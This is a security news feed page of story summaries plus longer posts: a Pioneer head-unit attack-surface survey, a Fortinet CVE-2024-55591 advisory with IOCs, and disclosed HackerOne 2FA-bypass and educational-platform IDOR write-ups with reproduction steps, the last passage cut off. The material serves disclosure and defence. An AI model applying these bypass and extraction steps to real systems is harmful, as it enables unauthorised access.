Security News

Cybersecurity researchers are calling attention to a series of cyber attacks that have targeted Chinese-speaking regions like Hong Kong, Taiwan, and Mainland China with a known malware called ValleyRAT. The attacks leverage a multi-stage loader dubbed PNGPlug to deliver the ValleyRAT payload, Intezer said in a technical report published last week. The infection chain commences with a phishing

by The Hacker News

The Computer Emergency Response Team of Ukraine (CERT-UA) is warning of ongoing attempts by unknown threat actors to impersonate the cybersecurity agency by sending AnyDesk connection requests. The AnyDesk requests claim to be for conducting an audit to assess the ""level of security,"" CERT-UA added, cautioning organizations to be on the lookout for such social engineering attempts that seek to

by The Hacker News

We’ve entered a new era where verification must come before trust, and for good reason. Cyber threats are evolving rapidly, and one of the trends getting a fresh reboot in 2025 is the “scam yourself” attacks. These aren’t your run-of-the-mill phishing scams. They are a sophisticated evolution of social engineering designed to deceive even the most tech-savvy users. Attackers exploit our routines, trust, and overconfidence, and complacency to manipulate us into becoming unwitting accomplices in … More → The post Scam Yourself attacks: How social engineering is evolving appeared first on Help Net Security.

by Help Net Security

In this Help Net Security, Nicholas Jackson, Director of Cyber Operations at Bitdefender, discusses how technologies like AI, quantum computing, and IoT are reshaping cybersecurity. He shares his perspective on the new threats these advancements bring and offers practical advice for organizations to stay prepared. What emerging technologies or trends could introduce entirely new types of cybersecurity threats? Emerging technologies such as AI, quantum computing, and IoT are reshaping the cybersecurity landscape. AI enables adversaries … More → The post Addressing the intersection of cyber and physical security threats appeared first on Help Net Security.

by Help Net Security

Fleet is an open-source platform for IT and security teams managing thousands of computers. It’s designed to work seamlessly with APIs, GitOps, webhooks, and YAML configurations. Fleet provides a single platform to secure and maintain all computing devices over the air. It offers a centralized solution, from mobile device management (MDM) to patching and verifying systems. It’s trusted in production environments. Deployments range from tens of thousands of hosts to large-scale environments supporting over 400,000 … More → The post Fleet: Open-source platform for IT and security teams appeared first on Help Net Security.

by Help Net Security

CISO Sempra Infrastructure | USA | Hybrid – View job details As a CISO, you will develop and implement a robust information security strategy and program that aligns with the organization’s objectives and regulatory requirements. Assess and manage cybersecurity risks across the organization’s digital infrastructure, networks, and sensitive data. Implement risk mitigation strategies and ensure regular risk assessments and audits. Cloud Security Engineer UBX | Philippines | On-site – View job details As a Cloud … More → The post Cybersecurity jobs available right now: January 21, 2025 appeared first on Help Net Security.

by Help Net Security

Windows LPE (@MrAle_98), CLR OPSEC (@passthehashbrwn), WinRM BOFs (@falconforceteam), Bitlocker bypass (@Neodyme), BloodHound CLI (@cmaddalena), and more!

by Bad Sector Labs

HPE is probing claims by the threat actor IntelBroker who is offering to sell alleged stolen source code and data from the company. Last week, the notorious threat actor IntelBroker announced on a popular cybercrime forum the sale of data allegedly stolen from HPE. IntelBroker, known for leaking data from major organizations, made the headlines […]

by Security Affairs

New research has uncovered security vulnerabilities in multiple tunneling protocols that could allow attackers to perform a wide range of attacks. ""Internet hosts that accept tunneling packets without verifying the sender''s identity can be hijacked to perform anonymous attacks and provide access to their networks,"" Top10VPN said in a study, as part of a collaboration with KU Leuven professor

by The Hacker News

Researchers linked the threat actor DoNot Team to a new Android malware that was employed in highly targeted cyber attacks. CYFIRMA researchers linked a recently discovered Android malware to the Indian APT group known as DoNot Team. The Donot Team (aka APT-C-35 and Origami Elephant) has been active since 2016, it focuses on government and military organizations, […]

by Security Affairs

The Threat actor known as DoNot Team has been linked to a new Android malware as part of highly targeted cyber attacks. The artifacts in question, named Tanzeem (meaning ""organization"" in Urdu) and Tanzeem Update, were spotted in October and December 2024 by cybersecurity company Cyfirma. The apps in question have been found to incorporate identical functions, barring minor modifications to the

by The Hacker News

Ukraine has restored the infrastructure of its state registers, which were disrupted last month by a major cyberattack believed to have been carried out by Russian military intelligence hackers.

by The Record

FortiGate firewall leak exposes 15,000+ configurations, impacting organizations globally. The actor behind the leak is Belsen Group. Learn…

by Hackread

As the digital world becomes more complicated, the lines between national security and cybersecurity are starting to fade. Recent cyber sanctions and intelligence moves show a reality where malware and fake news are used as tools in global politics. Every cyberattack now seems to have deeper political consequences. Governments are facing new, unpredictable threats that can''t be fought with

by The Hacker News

Explore industry moves and significant changes in the industry for the week of January 20, 2025. Stay updated with the latest industry trends and shifts.

by SecurityWeek

Feeling creative? Have something to say about cybersecurity? Submit your caption and our panel of experts will reward the winner with a $25 gift card.

by Dark Reading

Marco Raquan Honesty has pleaded guilty to his roles in several fraud schemes, including smishing, identity theft, and bank account takeover. The post Washington Man Admits to Role in Multiple Cybercrime, Fraud Schemes appeared first on SecurityWeek.

by SecurityWeek

by SC Media

Editing with LLMs, 80% faster Ax framework, AI-first Director of Finance, Obsidian 2024 Gems of the Year Voting, 8 Lessons from Red Teaming 100 Gen AI Products, The Big Ass Data Broker Opt-Out List, and more...

by Hive Five

Every week seems to bring news of another data breach, and it’s no surprise why: securing sensitive data has become harder than ever. And it’s not just because companies are dealing with orders of magnitude more data. Data flows and user roles are constantly shifting, and data is stored across multiple technologies and cloud environments. Not to mention, compliance requirements are only getting

by The Hacker News

A new investigation by security researcher Wladimir Palant reveals that malicious VPN extensions on the Chrome Web Store are using obfuscation techniques to bypass Google''s remote code execution restrictions. These extensions secretly collect browsing data, manipulate user traffic, and employ anti-debugging measures to evade detection. Intrusive VPN extensions Palant found that 32 VPN extensions rely … The post Malicious VPN Extensions Found Spying on Chrome Users appeared first on CyberInsider.

by Cyber Insider

A newly identified Adversary-in-the-Middle (AiTM) phishing kit, dubbed Sneaky 2FA, is being distributed as a Phishing-as-a-Service (PhaaS) operation on Telegram, enabling cybercriminals to bypass multi-factor authentication (MFA) protections for Microsoft 365 accounts. Sekoia’s Threat Detection & Research (TDR) team discovered the phishing kit in December 2024 during routine threat-hunting activities and has since linked it … The post New AiTM PhaaS Platform ‘Sneaky 2FA’ Targets Microsoft 365 Accounts appeared first on CyberInsider.

by Cyber Insider

A newly disclosed vulnerability in OpenAI''s ChatGPT API allows attackers to trigger Distributed Denial-of-Service (DDoS) attacks against arbitrary websites using OpenAI''s own infrastructure. The flaw enables an unauthenticated attacker to overwhelm a target website with HTTP requests originating from OpenAI''s Microsoft Azure-hosted servers. OpenAI, a leading artificial intelligence research organization, operates ChatGPT, one of the … The post Flaw in ChatGPT API Allows Powerful Reflective DDoS Attacks appeared first on CyberInsider.

by Cyber Insider

In this video, Kent Ickler and Jordan Drysdale discuss Attack Tactics 9: Shadow Credentials for Primaries, focusing on a specific technique used in penetration testing services at Black Hills Information Security The post Attack Tactics 9: Shadow Creds for PrivEsc w/ Kent & Jordan appeared first on Black Hills Information Security.

by Black Hills Information Security

For the upcoming Pwn2Own Automotive contest, a total of four in-vehicle infotainment (IVI) head units have been selected as targets. One of these is the single-DIN Pioneer DMH-WT7600NEX. This unit offers a variety of functionality, such as wired and wireless Android Auto and Apple CarPlay, USB media playback, and more. This blog post aims to detail some of the attack surfaces of the DMH-WT7600NEX unit as well as provide information on how to extract the software running on this unit for further vulnerability research.Software ExtractionThe initial effort to locate a serial console in the hope of easy software extraction bore no fruit. This left only a handful of options:·      Work with the software update package instead. However, the package was found to be encrypted, making this approach a dead end initially; more on that below.·      Attempt to desolder the eMMC chip and dump its contents using a programmer. This necessitates reballing and resoldering the eMMC chip, which is risky without proper SMD rework equipment.·      Attempt to extract eMMC contents in-system. This does not require any SMD rework, but the signal locations must be known, and the system must be powered and held in reset while dumping is in progress.The researchers chose the last option. Connecting to the eMMC chip could be performed via (thankfully labeled) test points on the board. The missing MMC_CLK signal was probed for using an oscilloscope; here is where it was found after numerous attempts. In addition to that, the main SoC was held in reset by pulling the test point labelled RSTN to ground via a 220 Ohm resistor and a switch.Note that when the SoC is held in reset, the 3.3V power line is cycled periodically by some other component, which powers off the eMMC chip. This is likely some watchdog component attempting to bring the system out of a hung state. Finding that component and persuading it not to do that was deemed too time consuming, and the 3.3V power rail was instead powered directly through a bench power supply.Data at RestAfter the eMMC chip was successfully “backed up,” it was time for Trend ZDI researchers to have a look at the 8 gigabytes of its contents. The image was found to sport a GPT partition table, with the following partitions defined after mounting the image via the loopback interface on a test system: There are two sets of bootable images, consisting of the header, boot, system, dtb, hirtos, bootloader, chips, and backup partitions. It is likely this is to safeguard against failed software updates, so there is a known good set of bootable images. Let’s have a closer look at what is contained in each partition:·      The header partition contains what looks like to be a description of other partitions in the set.·      The bootloader partition contains the bootloader as described, which seems to be a version of fastboot.·      The boot partition contains the Android/Linux kernel version 3.18.24.·      The dtb partition contains the DTB blob as described.·      The system partition contains the root file system.·      The hirtos partition contains a firmware image with ARM instructions. The exact purpose of this code is not currently known. The image consists of several chunks of code/data; some of it is obvious ARM code while others appear to be bitmap images. The following string was found inside the first chunk: “T-Monitor/triton_TCC897x Version 2.01.00” This suggests the code is to be executed on the main SoC but likely on a separate core.·      The chips partition contains the firmware for the GNSS daughter board.·      The backup partition contains some kind of binary data, rather sparsely organized.Interestingly enough, the system itself appears to be a Linux-based one; none of typical Android infrastructure could be located there. All the custom software is concentrated in /usr/local/ subdirectories.Software UpdatesObtaining an image of the code running on the device allowed a second look at the software update format. The latest update file can be obtained from the manufacturer; unfortunately, they do not seem to list previous versions. This is justified, as downgrading the software is not officially supported anyway—as the team found out firsthand.The software update package is structured like this:·      A header of 0x100 bytes describing the file, specifically the header size and the total size of the image, software version in this update, plus which model the update is for.·      An RSA signature block of 0x100 bytes, which can be verified by a certain public key hardcoded in the software. The signature covers the described header only.·      An RSA signature block of 0x100 bytes, which can be decrypted by the same key, and which carries an AES-256 key instead of the digest.·      Update data, encrypted with AES-256-CBC using the all-zero IV. This decrypts into a gzipped “raw” update image.The raw update image in turn consists of headers very similar to what can be found in the header partitions followed by a series of images for each partition mentioned in the headers. The image(s) can be processed further to extract the content of interest like the root file system.Serial ConsoleArmed with some knowledge of the unit’s software, it was time to revisit the search for the serial console.By studying the contents of the bootloader partitions, Trend ZDI researchers discovered the bootloader may use values from the backup partitions to decide which values to pass via the `console` and `login` kernel parameters, among other things. Specifically, the sector at byte offset 0x800800 contains that data. The format which this data is in can be reverse engineered both from the bootloader and the NPSystemDebug class implementation. Notably, it appears that manipulation of these values could be performed via the UI as the code flow can be traced all the way to the `UI_UIEB_MM_99_018` class which implements two buttons changing the state of the values. However, at the moment of writing it was unknown how to reach that specific UI screen.Thus, the direct manipulation of the flags was chosen instead. The contents of the backup partition were altered to enable both serial console and the login prompt. After probing the board connectors for any semblance of serial data, it was discovered on CN3603 pin 7. Connecting a UART-to-USB dongle to that pin confirmed that indeed, console output is present, as well as the login prompt. Only three signals are routed to that connector; however, the RX signal was not immediately identified among those.Studying the bottom layer of the board showed a single installed passive among several missing ones; this was one resistor pulling up a line otherwise not connected to any connector pin. Probing that line for being the missing RX line resulted in a success. Likely, one of the missing passives should connect that line to a connector pin. Now it was possible to communicate with the device—and log in locally. Having console access is always a big boon in vulnerability research.BluetoothThe vendor lists the following supported Bluetooth profiles:·      Advanced Audio Distribution Profile (A2DP)·      Hands-Free Profile·      Serial Port Profile·      Audio/Video Remote Control Profile (AVRCP) v1.6Given the rich history of bugs in Bluetooth-related functionality, this could be an interesting attack vector Wi-FiThe unit can be set up in both the client and access point modes for Wi-Fi.When in the AP mode, the unit allows using the WPS setup in addition to entering the PSK. This could potentially be an interesting attack angle as WPS flows were historically weak to attacks.After connecting to the unit in AP mode and running a network scan, the following TCP ports were found to be open: 5000, 38000, 38001, 42000, 43000, and 60000. Nmap script scan only showed that port 5000 uses TLS with a self-signed certificate; other services were not recognized. Using the console access, it is possible to map out the open ports to the corresponding processes (only ports allowed through the iptables are shown here for brevity): Given the abundance of what looks like non-standard services, Wi-Fi connectivity presents a potenially rewarding target for vulnerability research.USBThe unit is equipped with a single USB-C port that provides the necessary interface for wired Android Auto and Apple CarPlay. The USB port also supports playback of audio files from a USB flash drive. The supported audio filetypes are ·      MP3·      WMA·      WAV·      AAC·      FLAC·      DSDThe unit also supports video playback with the following formats listed as supported:·      AVI·      MPEG·      DivX·      MP4·      3GP·      MKV·      FLV·      WMV/ASF·      M4V·      H.263, H.264In addition, it is also possible to view images in BMP, JPEG, and PNG formats. Parsing complex file formats is error-prone and has been a rich source of exploitable bugs since time immemorial.Android Auto and Apple CarPlay Both wired and wireless Android Auto and Apple CarPlay are supported without the need for a third-party application to be installed on the paired mobile phone. When using the wireless versions, the paired phone connects to the aforementioned Wi-Fi network to establish a high-bandwidth channel for data to be sent and received. When connecting using a USB cable, the Wi-Fi network isn''t used by Android Auto or Apple CarPlay and can be disabled in Settings. As evidenced above, the `Media` process is likely responsible for handling both.Pwn2Own Automotive 2024 didn’t see any entries that leveraged Android Auto or Apple CarPlay functionality to compromise a head unit. We will have to wait and see if Pwn2Own Automotive 2025 does!SummaryWe hope that this blog post has provided enough information about the Pioneer DMH-WT7600NEX attack surface to guide vulnerability research. Not every attack surface has been mentioned, and we encourage researchers to investigate further. We are looking forward to Automotive Pwn2Own, again to be held in January 2025 at the Automotive World conference in Tokyo. We will see if IVI vendors have improved their product security. Don’t wait until the last minute to ask questions or register! We hope to see you there.You can find me on Mastodon at @InfoSecDJ, and follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.

by Zero Day Initiative Blog

Philippine authorities have arrested a Chinese national and two Filipino citizens suspected of conducting surveillance on critical infrastructure, including military facilities, the country’s National Bureau of Investigation (NBI) said on Monday.

by The Record

Overview Fortinet, a global leader in cybersecurity solutions, recently released a critical advisory addressing a significant vulnerability (CVE-2024-55591) in its FortiOS and FortiProxy products. This flaw, which has a CVSSv3 score of 9.6, is categorized as a critical authentication bypass vulnerability and is currently being exploited in the wild. Attackers leveraging this vulnerability can potentially gain super-admin privileges by exploiting weaknesses in the Node.js WebSocket module, making this a high-stakes issue for organizations relying on Fortinet''s products. This blog provides a detailed overview of the vulnerability, affected versions, Indicators of Compromise (IOCs), mitigation strategies, and steps for administrators to protect their systems effectively. The Vulnerability Explained The CVE-2024-55591 vulnerability stems from an ""Authentication Bypass Using an Alternate Path or Channel"" issue (CWE-288). An attacker can craft malicious requests to the Node.js WebSocket module, bypass authentication, and gain unauthorized super-admin access. Once exploited, the attacker can perform a wide range of malicious activities, including: Creating administrative or local user accounts. Modifying firewall policies, addresses, or system settings. Establishing Secure Sockets Layer Virtual Private Network (SSL VPN) tunnels to access internal networks. Affected Products and Versions The vulnerability impacts the following versions of FortiOS and FortiProxy products: FortiOS Versions 7.0.0 through 7.0.16 are affected. Versions 7.6, 7.4, and 6.4 are not affected. FortiProxy Versions 7.0.0 through 7.0.19. Versions 7.2.0 through 7.2.12. Versions 7.6 and 7.4 are not affected. Solution: Upgrade FortiOS to version 7.0.17 or later. Upgrade FortiProxy to versions 7.0.20 or 7.2.13 or later. How Attackers Exploit the Vulnerability Attackers exploit this vulnerability by sending malicious WebSocket requests to bypass authentication controls. They can target administrative accounts by guessing or brute-forcing usernames. Once access is gained, they perform the following malicious actions: Create random user accounts such as ""Gujhmk"" or ""M4ix9f"". Add these accounts to administrative or VPN groups. Use SSL VPN connections to infiltrate the internal network. Indicators of Compromise (IOCs) Fortinet has shared some key IOCs that organizations should monitor to identify potential attacks. Log Entries Look for the following types of suspicious log entries in your system: Successful Admin Logins: type=""event"" subtype=""system"" level=""information"" logdesc=""Admin login successful"" user=""admin"" ui=""jsconsole"" srcip=1.1.1.1 dstip=1.1.1.1 action=""login"" status=""success""  msg=""Administrator admin logged in successfully from jsconsole"" Unauthorized Configuration Changes: type=""event"" subtype=""system"" level=""information"" logdesc=""Object attribute configured"" user=""admin"" ui=""jsconsole(127.0.0.1)"" action=""Add"" msg=""Add system.admin vOcep"" Suspicious IP Addresses Attackers have been observed using the following IP addresses to launch attacks: 45.55.158.47 (most commonly used) 87.249.138.47 155.133.4.175 37.19.196.65 149.22.94.37 It’s important to note that these IP addresses are not fixed sources of attack traffic; they are often spoofed and may not represent the actual origin. Recommended Actions 1. Update Immediately If your organization is using affected versions of FortiOS or FortiProxy, the most effective solution is to upgrade to the latest secure versions. Fortinet has provided tools to assist with upgrading, which can be found on their official site. 2. Mitigations for Immediate Protection If an upgrade cannot be performed immediately, consider implementing the following mitigations: Disable HTTP/HTTPS Administrative Interfaces: This reduces the exposure of management interfaces to the internet. Restrict Access with Local-In Policies:Limit access to the administrative interface by allowing only trusted Ips Use Non-Standard Admin Usernames: To make brute-force attacks more difficult, avoid predictable or default usernames for administrative accounts. Exploitation in the Wild Reports indicate active exploitation of this vulnerability. Threat actors have been observed creating random administrative or local user accounts, such as: Gujhmk Ed8x4k Alg7c4 These accounts are often added to SSL VPN user groups to establish tunnels into internal networks, making it critical to monitor for unauthorized account creation. Best Practices for Enhanced Security Enable Logging and Monitoring:Continuously monitor system logs for any unauthorized administrative activity, suspicious configuration changes, or unexpected VPN connections. Conduct Regular Vulnerability Scans:Perform routine scans to identify and patch other vulnerabilities within your network infrastructure. Adopt a Zero Trust Approach:Limit user privileges to the minimum required and enforce strict access controls, especially for administrative tasks. Educate Your Team:Ensure that your IT and security teams are aware of this vulnerability and trained to respond to potential threats. Implement Multi-Factor Authentication (MFA):Although this vulnerability bypasses traditional authentication, MFA adds an additional layer of security that can mitigate other attack vectors. Conclusion The CVE-2024-55591 vulnerability emphasizes the critical need for organizations to stay ahead of emerging threats. With attackers actively exploiting this flaw to gain super-admin access, the risks to your infrastructure and data cannot be overstated. Organizations using FortiOS and FortiProxy must act immediately. Patching systems and implementing mitigations isn’t optional; it’s imperative. It’s not just about reacting to vulnerabilities—it’s about adopting a proactive and layered approach to cybersecurity. Leveraging tools like multi-factor authentication, real-time log monitoring, and Zero-Trust architectures can significantly reduce the risk of exploitation. The broader lesson here is clear: vulnerabilities are inevitable, but breaches don’t have to be. By staying informed, investing in advanced threat detection systems, and fostering a security-first mindset within your organization, you can not only address immediate threats but also build resilience against future ones. As cyber threats grow more advanced, are you prepared to meet them head-on? Strengthening your defenses today will determine your security tomorrow. Let this be a reminder to continuously innovate and adapt in the face of an ever-changing threat landscape. Your next step could define the safety of your organization. Source: https://www.csa.gov.sg/alerts-advisories/alerts/2025/al-2025-004 https://www.fortiguard.com/psirt/FG-IR-24-535 https://nvd.nist.gov/vuln/detail/CVE-2024-55591 The post Fortinet Zero-Day CVE-2024-55591 Exposed: Super-Admin Access Risk appeared first on Cyble.

by CYBLE

Eskenzi PR are proud to announce that KnowBe4, Mimecast, Varonis, Bridewell, Certes, and Pentest Tools have joined BT as sponsors for this year’s Most Inspiring Women in Cyber Awards. The 5th annual event, held at the iconic BT Tower on the 26th February 2025, aims to celebrate trailblazers from across the cybersecurity industry who are […] The post Forward-Thinking Industry Leaders Sponsor Most Inspiring Women in Cyber Awards 2025 appeared first on IT Security Guru.

by IT Security Guru

Cloud enumeration and exploitationContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

Severity: Medium (5.0) — High (7.1)Weakness: Improper AuthorizationBounty: $10,000 Summary:First, the initial submission got a bounty of $2,500. But while HackerOne was doing their Root Cause Analysis (RCA) of my report submission, they have stumbled upon another vulnerability with High severity.Since my submission gives them a nudge in the right direction, they rewarded me another $7,500 for the increase scope of finding.Research:My routine when i am hunting on HackerOne main platform is always checking if they have new incoming feature, And i saw that there is beta feature called Embedded Submission Form which enables hackers to Anonymously submit reports without having to create an account on HackerOne. For additional information. Learn more here.Now, with that new feature i have found an Improper Authorization bug that bypasses the 2 security features of HackerOne for the bug bounty programs.Bypass 2FA requirements when submitting new reports to a program. Learn more here.Bypass hacker blacklisted by a program (when a program does not want to receive report from specific hackers). Learn more here.Bypass 2FA requirements when submitting new reports to a programA program owner can enforce the hackers to setup the two-factor authentication before submitting new reports to their program here: https://hackerone.com/<program>/submission_requirements (see below image)Enabled 2FA requirementsThe Parrot Sec program has this feature enabled to enforce the hackers to setup 2FA before submitting reports. I removed my 2FA in my account to test and it is good that i was block from submitting new reports (see below image)2FA required by the program before submitting new reports.Now i was able to bypass this 2FA setup requirements by using the Parrot Sec program Embedded Submission Form.Steps to reproduce:Login to your account and remove your 2FA on your account (if you already setup it)Now go to https://hackerone.com/parrot_sec and hit Submit Report button, observed that you cannot submit report unless you will enable your 2FA.BYPASS: Get the Embedded Submission URL on their policy page: i get this > https://hackerone.com/<redacted_UUID>/embedded_submissions/newNow submit report using that embedded submission form and you can submit reports without setting-up your 2FA, despite the program enforce the user to setup the 2FA before submitting new reports.2FA requirements successfully bypassed!ImpactUsers can still submit a report to a program despite the program owner require a 2FA enabled to account before hacker can submit reports.Bypass Hacker Blacklisted to a programIf a hacker’s behavior is out of sync with what is outlined on bug bounty program Security Page, or if they’ve violated part of the HackerOne Code of Conduct, program owners can take action to ban hackers from participating in their program. BBP program owners can ban hackers from both private and public programs. (see below image), For additional information.. Learn more here.Program blacklisting hackers.So i ask a good friend of mine Ace Candelario (phspade) to ban my h1/japz account on HackerOne Parrot Sec program from submitting a new report, btw he is the Philippine Ambassador of Parrot Security and one of the Triager in Parrot Sec hackerone program. After banning my account i try to submit a report and clicking on the submit report button redirects me to Page not found error page (see below).Error page when you are banned to specific program and try to submit a report.It’s good, the reason why i cannot submit a new report is because i am banned/black-listed on the parrot sec program. :)But using the same steps to reproduce on my first bypass above (Bypassing 2FA requirements), I was able to submit a new report to the bbp program despite i am already banned.ImpactMalicious user can still submit a report as many as he/she want despite the program owner banned/black-list the hackers.Note: This second bypass have turns out to have the same root cause of the first bypass above, therefore it was closed as duplicate of my first report #418767.HackerOne Co-Founder Jobert closed the report as duplicate because it has the same root cause of the first bug mentioned above.Disclosure Timeline2018–10–04 02:41:19 — Report submitted to HackerOne security team.2018–10–05 20:07:59 — Security team acknowledge and Triage the report2018–10–05 20:53:21 — $10,000 Bounty rewarded.2018–10–06 00:38:15 — Fix for the High severity bug released to production, while the initial submission (Medium) was still ongoing fix.2018–10–25 23:11:03 — Fix for Medium severity bug that is initially reported was released to production2018–10–25 23:11:03 —Status: ResolvedOriginal submission reference: Hacker can bypass 2FA requirement and reporter blacklist through embedded submission formShout’out to all Pinoy Bug Bounty Hunters out there! :)Cheers!Japzhttps://twitter.com/japzdivinohttps://instagrahttps://www.facebook.com/pinoywhitehatBypass HackerOne 2FA requirement and reporter blacklist was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

​Microsoft has reminded admins that Exchange 2016 and Exchange 2019 will reach the end of extended support in October and shared guidance for those who need to decommission outdated servers. [...]

by BleepingComputer

For the latest discoveries in cyber research for the week of 20th January, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Hotel management platform Otelier has suffered a data breach that resulted in extraction of almost eight terabytes of data. The threat actors compromised company’s Amazon S3 cloud storage, stealing guests’ personal information […] The post 20th January– Threat Intelligence Report appeared first on Check Point Research.

by Check Point Research

Is the Threat Finally Diminishing?”Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

After years in the technical writing trenches at industry giants like Cisco, Riverbed, and Akamai, I now lead the Sysdig... The post Manager as mentor: Learnings from Sysdig’s documentation team appeared first on Sysdig.

by Sysdig

Cyble honeypots have detected vulnerability exploits on Check Point and Ivanti products, databases, CMS systems, and many other IT products. Overview Cyble honeypot sensors have detected new attacks on vulnerabilities in Check Point and Ivanti products, among dozens of other vulnerability exploits recently picked up by Cyble sensors. Cyble’s sensor intelligence reports to clients in the first two weeks of 2025 also highlighted new database and CMS attacks. Unpatched Linux systems and network and IoT devices remain popular targets for hackers looking to breach networks and add to botnets. The reports also examined new brute-force attacks and phishing campaigns. Here are some of the highlights. Vulnerabilities Under Attack Here are some of the vulnerability exploits detected by Cyble sensors. CVE-2024-24919 is an 8.6-severity vulnerability affecting Check Point CloudGuard Network, Quantum Maestro, Quantum Scalable Chassis, Quantum Security Gateways, and Quantum Spark Appliances, identified by Check Point being actively exploited. If successfully exploited, the vulnerability could allow an attacker to access sensitive information on Internet-connected Gateways that have a remote access VPN or mobile access enabled, and potentially move laterally and gain domain admin privileges. Ivanti had a challenging 2024, with 11 vulnerabilities added to CISA’s Known Exploited Vulnerabilities catalog, trailing only Microsoft, and new vulnerabilities have already been added this year. One particular Ivanti vulnerability that Cyble is detecting attacks on is CVE-2024-7593, a 9.8-severity Ivanti Virtual Traffic Manager (vTM) vulnerability that enables a remote, unauthenticated attacker to bypass admin panel authentication due to a flawed implementation of the authentication algorithm. Attackers are exploiting CVE-2024-8503, a time-based SQL injection vulnerability in VICIDIAL that could allow an unauthenticated attacker to enumerate database records. By default, VICIDIAL stores plaintext credentials within the database. VICIDIAL is a software suite that works with the Asterisk Open-Source PBX Phone system to create an inbound/outbound contact center. CVE-2024-7120 is a critical OS command injection vulnerability in the web interface of Raisecom MSG gateways, specifically MSG1200, MSG2100E, MSG2200, and MSG2300 devices running version 3.90. The flaw in the list_base_config.php file allows remote attackers to exploit the template parameter to execute arbitrary commands. Public exploits are available for this vulnerability. CVE-2024-56145 is a critical vulnerability in Craft CMS systems. If the register_argc_argv setting in php.ini is enabled, this issue affects users of impacted versions, allowing an unspecified remote code execution vector. Users are advised to update to versions 3.9.14, 4.13.2, or 5.5.2. Those unable to upgrade should mitigate the risk by disabling register_argc_argv in their PHP configuration. Cyble sensors have also identified attackers scanning for the URL ""/+CSCOE+/logon.html"", which is used to access the login page for the Cisco Adaptive Security Appliance (ASA) WebVPN service. The URL has been found to have various vulnerabilities, including cross-site scripting, path traversal, and HTTP response splitting, which could allow attackers to execute arbitrary code, steal sensitive information, or cause a denial of service. Brute-Force Attacks The Cyble sensor reports also include considerable detail on brute-force attacks. These attacks frequently target remote desktops and access systems, with ports 5900 (VNC), 3389 (RDP), and 22 (SSH) being the most frequently attacked ports. Other frequently attacked ports include 3386 (GPRS tunneling), 445 (SMB), and 23 (Telnet). Cyble advises adding security system blocks for frequently attacked ports. Recommendations and Mitigations Cyble researchers recommend the following security controls: Blocking target hashes, URLs, and email info on security systems (Cyble clients receive a separate IoC list). Immediately patch all open vulnerabilities listed here and routinely monitor the top Suricata alerts in internal networks. Constantly check for Attackers’ ASNs and IPs. Block Brute Force attack IPs and the targeted ports listed. Immediately reset default usernames and passwords to mitigate brute-force attacks and enforce periodic changes. For servers, set up strong passwords that are difficult to guess. Conclusion With many active threats against both new and older vulnerabilities, organizations need to remain vigilant and responsive, patching quickly and applying mitigations where patching isn’t possible. To protect their digital assets, organizations should address known vulnerabilities and implement recommended security controls, such as blocking malicious IPs and securing network ports. A proactive and layered security approach is critical for defending against exploits and data breaches. To access the full sensor intelligence reports from Cyble, along with IoCs and additional insights and details, click here. The post Cyble Sensors Detect Attacks on Check Point, Ivanti and More appeared first on Cyble.

by CYBLE

Companies are showing customers different prices for the same goods and services based what data they have on them, including details like their precise location or browser history.

by Malwarebytes Labs

At Red Siege, we’ve earned our reputation as a leader in offensive security by delivering expert-driven solutions that prioritize what matters most to CISOs and cybersecurity professionals. From penetration testing […]

by Red Siege Blog

The US Department of Commerce will prohibit the import of components for connected vehicles from China or Russia, as the US continues to ban technology it sees as potential national security threats.

by Dark Reading

Hewlett Packard Enterprise (HPE) is investigating claims of a new breach after a threat actor said they stole documents from the company''s developer environments. [...]

by BleepingComputer

New hands-on testing results show that most devices are unable to catch phishing emails, texts, or calls, leaving users at risk.

by Dark Reading

Social media security startup Spikerz has raised $7 million in a seed funding round led by Disruptive AI. The post Social Media Security Firm Spikerz Raises $7 Million appeared first on SecurityWeek.

by SecurityWeek

Kaspersky has disclosed the details of over a dozen vulnerabilities discovered in a Mercedes-Benz MBUX infotainment system.  The post Details Disclosed for Mercedes-Benz Infotainment Vulnerabilities appeared first on SecurityWeek.

by SecurityWeek

Threat actors are abusing Google Translate’s redirect feature to craft phishing links that appear to belong to, according to researchers at Abnormal Security.

by KnowBe4

An SMS phishing (smishing) campaign is attempting to trick Apple device users into disabling measures designed to protect them against malicious links, BleepingComputer reports.

by KnowBe4

A recent Global Cybersecurity Outlook report by the World Economic Forum reveals that over 40% of African companies lack confidence in their governments'' ability to handle major cybersecurity incidents, a higher percentage than in other global regions. The post African firms worry over state cyber safeguards – The Citizen appeared first on ZENDATA Cybersecurity.

by Zendata

Interpol has recently recommended discontinuing the use of the term ""Pig Butchering"" in cybercrime discussions, expressing concern that such terminology may discourage victims from reporting incidents due to feelings of shame or embarrassment.

by KnowBe4

In the ever-evolving landscape of digital education, ensuring the security of online platforms is paramount. As a security researcher, I have dedicated my efforts to uncovering vulnerabilities that could question the integrity and safety of online educational domains. In this article, I will walk you through three different bugs I discovered within the educational domain, detailing the journey from initial discovery to successful patching. By sharing these insights, I hope to highlight the importance of robust security measures in protecting our digital learning environments.The target of mine was an educational platform offering a variety of paid and free courses, with a straightforward account registration process that was free of charge. As I delved into the platform’s infrastructure, I discovered several vulnerabilities that could potentially be exploited. In the upcoming sections, I will provide a detailed analysis of each vulnerability, including how they were identified and their potential impact.1. IDOR to answer questions on the behalf of victimThe first vulnerability I discovered was an Insecure Direct Object Reference (IDOR), which allowed an attacker to answer questions on behalf of other users. This flaw was found in the platform’s quiz and assessment feature, where users could submit answers to various questions in the respective module. By simply changing the numeric value in the request that represented the answer ID of an user, an attacker could manipulate the ID to submit answers as if they were the victim. The PUT request would look something like:In the above request, simply changing the numeric value after answers would make system to answers different questions of other users and the “choice_id” stores the numeric value representing options like either a,b,c,d.2. Leaking Quiz Answers in API requestWhenever any course or certifications are bought, users should answers all the questions correctly in order to pass the course or certifications. Upon attempting questions after completing each module, an API endpoint labeled “GET /api/course_player/v2/quizzes/{value}” was called. This endpoint retrieves multiple-choice question (MCQ) quizzes, and the response includes questions along with their respective options. Each options within the response contains a parameter named “credited”, which holds a Base64 encoded value. Upon decoding this value, it reveals whether the option is correct or not, denoted by either “true” or “false.” The vulnerable GET request would look alike:And the JSON response which exposes the correct answers to the quiz questions was like:So, above is small JSON response of one of the questions and you can see there are four options named {option_one, option_two, option_three, option_four } for that questions along with the 